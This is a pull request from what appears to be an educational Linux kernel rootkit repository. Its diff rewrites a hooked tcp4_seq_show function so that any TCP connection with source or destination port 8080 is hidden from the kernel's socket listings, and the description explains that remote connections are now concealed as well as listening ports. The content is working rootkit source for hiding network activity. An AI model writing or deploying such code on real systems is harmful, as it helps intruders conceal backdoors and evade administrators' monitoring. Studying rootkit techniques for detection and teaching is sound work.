### PR TITLE
Add hide remote port (#11)

### DIFF
--- a/3_RootkitTechniques/3.6_hiding_ports/rootkit.c
+++ b/3_RootkitTechniques/3.6_hiding_ports/rootkit.c
@@ -20,16 +20,19 @@ static asmlinkage long (*orig_tcp4_seq_show)(struct seq_file *seq, void *v);
 /* This is our hook function for tcp4_seq_show */
 static asmlinkage long hook_tcp4_seq_show(struct seq_file *seq, void *v)
 {
-	long ret;
-	struct sock *sk = v;
+    struct inet_sock *is;
+    long ret;
+    unsigned short port = htons(8080);
 
-	/* 0x1f90 = 8080 in hex */
-	if (sk != (struct sock *)0x1 && sk->sk_num == 0x1f90)
-	{
-		printk(KERN_DEBUG "rootkit: Found process listening on port 8080 - hiding!\n");
-		return 0;
+    if (v != SEQ_START_TOKEN) {
+		is = (struct inet_sock *)v;
+		if (port == is->inet_sport || port == is->inet_dport) {
+			printk(KERN_DEBUG "rootkit: sport: %d, dport: %d\n",
+				   ntohs(is->inet_sport), ntohs(is->inet_dport));
+			return 0;
+		}
 	}
-	
+
 	ret = orig_tcp4_seq_show(seq, v);
 	return ret;
 }


### PR DESCRIPTION
Cast `v` argument in `hook_tcp4_seq_show()` to `struct inet_sock` instead of `sock`, and compare `inet_sport` and `inet_dport` fields for port `8080`. Remote connections on port 8080 now hidden as well as listening ports.